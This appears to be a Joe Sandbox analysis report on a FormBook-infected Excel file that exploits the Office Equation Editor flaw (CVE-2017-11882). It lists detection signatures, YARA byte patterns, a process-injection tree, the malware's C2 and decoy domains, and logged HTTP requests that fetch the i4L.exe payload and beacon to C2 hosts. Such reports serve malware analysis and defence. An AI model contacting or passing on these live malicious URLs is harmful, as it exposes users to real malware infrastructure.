Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SWIFT - Copy - Copy.xlsx

Overview

General Information

Sample Name:SWIFT - Copy - Copy.xlsx
Analysis ID:553293
MD5:338cbe8a882d7c941afe2cf895055bd5
SHA1:f081a9d12054b2e1a59d3eae4fa65059db634268
SHA256:097ce13d935a168aa627794fce83fb57b3ad39989c46b574acb13820edbafe4a
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1928 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2568 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • Pcportk28.exe (PID: 2124 cmdline: C:\Users\Public\Pcportk28.exe MD5: 25EE51200E7D86AB2C531748E5C01C72)
      • Pcportk28.exe (PID: 1964 cmdline: C:\Users\Public\Pcportk28.exe MD5: 25EE51200E7D86AB2C531748E5C01C72)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wininit.exe (PID: 1760 cmdline: C:\Windows\SysWOW64\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
            • cmd.exe (PID: 2564 cmdline: /c del "C:\Users\Public\Pcportk28.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.Pcportk28.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.Pcportk28.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.Pcportk28.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        5.0.Pcportk28.exe.400000.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.Pcportk28.exe.400000.9.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 25 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 131.153.37.4, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2568, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2568, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\Pcportk28.exe, CommandLine: C:\Users\Public\Pcportk28.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pcportk28.exe, NewProcessName: C:\Users\Public\Pcportk28.exe, OriginalFileName: C:\Users\Public\Pcportk28.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2568, ProcessCommandLine: C:\Users\Public\Pcportk28.exe, ProcessId: 2124
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\Pcportk28.exe, CommandLine: C:\Users\Public\Pcportk28.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pcportk28.exe, NewProcessName: C:\Users\Public\Pcportk28.exe, OriginalFileName: C:\Users\Public\Pcportk28.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2568, ProcessCommandLine: C:\Users\Public\Pcportk28.exe, ProcessId: 2124
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\wininit.exe, CommandLine: C:\Windows\SysWOW64\wininit.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wininit.exe, NewProcessName: C:\Windows\SysWOW64\wininit.exe, OriginalFileName: C:\Windows\SysWOW64\wininit.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\wininit.exe, ProcessId: 1760

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://mikeloayza.com/E9/i4L.exeAvira URL Cloud: Label: malware
          Source: https://mikeloayza.com/E9/i4L.exeAvira URL Cloud: Label: malware
          Machine Learning detection for sampleShow sources
          Source: SWIFT - Copy - Copy.xlsxJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\Pcportk28.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exeJoe Sandbox ML: detected
          Source: 5.2.Pcportk28.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.Pcportk28.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.Pcportk28.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.Pcportk28.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2
          Source: Binary string: wininit.pdb source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
          Source: Binary string: ILi.pdb source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
          Source: global trafficDNS query: name: mikeloayza.com
          Source: C:\Users\Public\Pcportk28.exeCode function: 4x nop then pop ebx5_2_00406AB6
          Source: C:\Users\Public\Pcportk28.exeCode function: 4x nop then pop edi5_2_0040C3FB
          Source: C:\Users\Public\Pcportk28.exeCode function: 4x nop then pop edi5_2_0041565B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi7_2_000EC3FB
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi7_2_000F565B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop ebx7_2_000E6AB6
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 131.153.37.4:80
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 131.153.37.4:443

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.executive-air.net
          Source: C:\Windows\explorer.exeDomain query: www.bitcointradel.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.209.73 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.freeadakahamazon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.67.131.217 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fisioletsgo.com
          Source: C:\Windows\explorer.exeDomain query: www.luckyfandom.com
          Source: C:\Windows\explorer.exeNetwork Connect: 216.239.34.21 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.healingandhealthy.com/i6ro/
          Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
          Source: Joe Sandbox ViewASN Name: CLEAR-AS-APClearNetworksPtyLtdAU CLEAR-AS-APClearNetworksPtyLtdAU
          Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1Host: www.fisioletsgo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1Host: www.bitcointradel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1Host: www.executive-air.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1Host: www.luckyfandom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 118.67.131.217 118.67.131.217
          Source: global trafficHTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: mikeloayza.com
          Source: global trafficHTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mikeloayza.comConnection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 14 Jan 2022 15:06:04 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be761-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
